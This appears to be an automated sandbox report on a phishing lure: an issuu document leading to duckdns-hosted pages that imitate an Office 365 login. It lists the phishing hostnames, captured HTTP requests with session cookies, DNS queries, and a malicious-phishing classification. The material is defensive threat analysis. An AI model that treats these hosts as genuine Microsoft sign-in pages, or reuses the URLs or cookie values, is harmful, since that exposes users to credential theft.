en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; fpc=AhZw6wgefU5EjPVIkl7TY3A; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe4rBdDu3QHLdW6yNeJI5LVPiJ0tNgB7pqxbW6BbDWk8T4ccOxwecZ4sYLrneDePpy33L9HL_mZPxYc-iiY1ghlJx7MsEHw-C8NTDJuRS3Nhwmvt3vK19idGqossesOetsct7vSWuLkhs4N2at-juuviXUEFgj1dGy1x8gpSHefjUgAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd
        Source: global trafficHTTP traffic detected: GET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda/0b62916e90a58b06d55d641ab5a9498315d5f8c709ae45fba0e8f54e3b669413.js HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
        Source: global trafficHTTP traffic detected: GET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda.js HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
        Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
        Source: global trafficHTTP traffic detected: GET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda.js HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
        Source: global trafficHTTP traffic detected: GET /s/82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda/0b62916e90a58b06d55d641ab5a9498315d5f8c709ae45fba0e8f54e3b669413.js HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; buid=1.AUgAMe_N-B6jSkuT5F9XHpElWltEZUfGMrBJg-Ydk3ZSdsoBAABIAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFePPCWBfcKD7-r-M-d269POSkTa98E2ELdhIeb6ruie_7cVzsAGE4eSEw9Le9KVNMBnfgTuxqUvIGoX42QTuRH4m-yOstjit5DYVmjeuWjfvMgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFe59SDF3lzt7wrQUxlo0kNVHWurdtqCciXpW35FLLHD-t5qoOJIU5QkFumK2WH5vJnntBt6i6ubcTkg7AfJlwA4E1evfLwed6kIph70dS5phMYRxMqZSYJ6UY_pAx0SnGM0OxtsdCUb2Rd6dbPKmJR44OJ5_g92NFfY2bVDU9fXN0gAA; esctx-wEYa8ewq0Cc=AQABCQEAAADW6jl31mB3T7ugrWTT8pFeEhhlp5n_ZWsWfWaNUXZOvPLmhN43HXdkkO80UcyU6uRIX2PlsNjGWebNfhSs7NYGEfG148JAlhjS7AEcqzfG4PGYm8RkRNVixo7c7O6ig5Fqq5g4P_FnPabj-8mBdP4STdTZ1q6CRdSRpJG_3B_Z9yAA; fpc=AhZw6wgefU5EjPVIkl7TY3C8Ae7AAQAAACYJ_d4OAAAA
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: return b}VD.F="internal.enableAutoEventOnTimer";var Vb=wa(["data-gtm-yt-inspected-"]),XD=["www.youtube.com","www.youtube-nocookie.com"],YD,ZD=!1; equals www.youtube.com (Youtube)
        Source: global trafficDNS traffic detected: DNS query: www.google.com
        Source: global trafficDNS traffic detected: DNS query: issuu.com
        Source: global trafficDNS traffic detected: DNS query: static.isu.pub
        Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
        Source: global trafficDNS traffic detected: DNS query: o4505883345354752.ingest.sentry.io
        Source: global trafficDNS traffic detected: DNS query: reader3.isu.pub
        Source: global trafficDNS traffic detected: DNS query: consent.cookiebot.com
        Source: global trafficDNS traffic detected: DNS query: pingback.issuu.com
        Source: global trafficDNS traffic detected: DNS query: api.issuu.com
        Source: global trafficDNS traffic detected: DNS query: assets.isu.pub
        Source: global trafficDNS traffic detected: DNS query: layers.isu.pub
        Source: global trafficDNS traffic detected: DNS query: image.isu.pub
        Source: global trafficDNS traffic detected: DNS query: spidersense.bendingspoons.com
        Source: global trafficDNS traffic detected: DNS query: assets-eur.mkt.dynamics.com
        Source: global trafficDNS traffic detected: DNS query: public-eur.mkt.dynamics.com
        Source: global trafficDNS traffic detected: DNS query: officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: global trafficDNS traffic detected: DNS query: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: global trafficDNS traffic detected: DNS query: vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
        Source: global trafficDNS traffic detected: DNS query: logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: unknownHTTP traffic detected: POST /api/4506104688082944/envelope/?sentry_key=20169667e5c7bfec02249a8341e145fa&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.108.0 HTTP/1.1Host: o4505883345354752.ingest.sentry.ioConnection: keep-aliveContent-Length: 481sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: text/plain;charset=UTF-8Accept: */*Origin: https://issuu.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 24 Dec 2024 19:56:26 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 24 Dec 2024 19:57:07 GMTContent-Length: 0Connection: closex-ms-trace-id: 7341764c30c37ff762c6cb512922ba62Strict-Transport-Security: max-age=2592000; preload
        Source: chromecache_126.2.drString found in binary or memory: http://ogp.me/ns#
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
        Source: chromecache_123.2.drString found in binary or memory: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/forms/afd683a
        Source: chromecache_99.2.drString found in binary or memory: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standalonefor
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://assets.nflxext.com/us/email/gem/nflx.png
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://cct.google/taggy/agent.js
        Source: chromecache_126.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js
        Source: chromecache_126.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/react-is/17.0.2/umd/react-is.production.min.js
        Source: chromecache_126.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/react/17.0.2/umd/react.production.min.js
        Source: chromecache_126.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/styled-components/5.3.11/styled-components.min.js
        Source: chromecache_123.2.drString found in binary or memory: https://cxppusa1formui01cdnsa01-endpoint.azureedge.net/eur/FormLoader/FormLoader.bundle.js
        Source: chromecache_126.2.drString found in binary or memory: https://image.isu.pub/241224193034-77c097d7eadd36d5a1226b1a395fdd6b/jpg/page_1.jpg
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31
        Source: chromecache_126.2.drString found in binary or memory: https://issuu.com/txbct.com/docs/navex_quote_65169.
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://mwf-service.akamaized.net/mwf/css/bundle/1.57.8/west-european/default/amc.min.css
        Source: chromecache_98.2.dr, chromecache_121.2.drString found in binary or memory: https://officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/hJEchGjd
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://pagead2.googlesyndication.com
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://pagead2.googlesyndication.com/pagead/gen_204?id=tcfe
        Source: chromecache_123.2.drString found in binary or memory: https://public-eur.mkt.dynamics.com/api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpagefo
        Source: chromecache_125.2.dr, chromecache_101.2.dr, chromecache_78.2.dr, chromecache_117.2.drString found in binary or memory: https://reactjs.org/docs/error-decoder.html?invariant=
        Source: chromecache_78.2.drString found in binary or memory: https://reactjs.org/link/react-polyfills
        Source: chromecache_126.2.drString found in binary or memory: https://static.isu.pub/fonts/inter/v3_19/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa1ZL7W0Q5nw.woff2
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://td.doubleclick.net
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://www.google.com
        Source: chromecache_105.2.dr, chromecache_119.2.drString found in binary or memory: https://www.googleadservices.com
        Source: chromecache_119.2.drString found in binary or memory: https://www.googletagmanager.com
        Source: chromecache_126.2.drString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
        Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
        Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
        Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
        Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
        Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
        Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
        Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
        Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
        Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
        Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
        Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
        Source: classification engineClassification label: mal56.phis.troj.win@18/87@66/9
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2252,i,13392327784317788276,4031343908889293815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ"
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2252,i,13392327784317788276,4031343908889293815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
